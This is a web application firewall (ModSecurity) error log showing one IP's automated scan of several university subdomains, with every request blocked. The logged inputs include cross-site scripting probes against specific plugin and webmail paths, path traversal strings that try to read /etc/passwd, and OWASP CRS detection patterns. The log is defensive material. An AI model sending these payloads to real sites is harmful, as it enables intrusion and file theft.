[Tue Aug 29 11:55:21.608957 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OcCo-f0AAApHRgAAAAAP"]
[Tue Aug 29 11:55:21.656448 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16OcCo-f0AAAqqtdoAAAAA"]
[Tue Aug 29 11:55:22.537313 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAAolKmsAAAAe"]
[Tue Aug 29 11:55:22.564379 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApHRgUAAAAP"]
[Tue Aug 29 11:55:22.565173 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApbUfoAAAAh"]
[Tue Aug 29 11:55:22.569634 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqqtd0AAAAA"]
[Tue Aug 29 11:55:22.573727 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApXgocAAAAU"]
[Tue Aug 29 11:55:22.673464 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqqteAAAAAA"]
[Tue Aug 29 11:55:22.675202 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApa-N4AAAAg"]
[Tue Aug 29 11:55:22.675645 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApHRgkAAAAP"]
[Tue Aug 29 11:55:22.718256 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAAqqteIAAAAA"]
[Tue Aug 29 11:55:22.726736 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApa-OAAAAAg"]
[Tue Aug 29 11:55:23.557598 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAqeFVEAAAAx"]
[Tue Aug 29 11:55:23.743050 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAApXgooAAAAU"]
[Tue Aug 29 11:55:23.825672 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAqqtecAAAAA"]
[Tue Aug 29 11:55:23.848925 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAqeFVIAAAAx"]
[Tue Aug 29 11:55:23.876536 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAApbUgMAAAAh"]
[Tue Aug 29 11:55:23.903423 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAApbUgQAAAAh"]
[Tue Aug 29 11:55:23.937276 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAApa-OUAAAAg"]
[Tue Aug 29 11:55:23.941166 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAqqtekAAAAA"]
[Tue Aug 29 11:55:23.959557 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAoz8E0AAAAS"]
[Tue Aug 29 11:55:23.965501 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAqeFVUAAAAx"]
[Tue Aug 29 11:55:23.995095 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAqSwssAAAAN"]
[Tue Aug 29 11:55:23.997579 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAolKngAAAAe"]
[Tue Aug 29 11:55:24.001197 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAApbUggAAAAh"]
[Tue Aug 29 11:55:24.018641 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16PMCo-f0AAAolKnkAAAAe"]
[Tue Aug 29 11:55:24.018806 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAApa-OkAAAAg"]
[Tue Aug 29 11:55:24.047176 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAAqSws0AAAAN"]
[Tue Aug 29 11:55:24.540432 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAoAlAIAAAAC"]
[Tue Aug 29 11:55:24.559722 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApXgowAAAAU"]
[Tue Aug 29 11:55:24.564052 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAoAlAMAAAAC"]
[Tue Aug 29 11:55:24.587309 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApXgo0AAAAU"]
[Tue Aug 29 11:55:24.591693 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApa-OwAAAAg"]
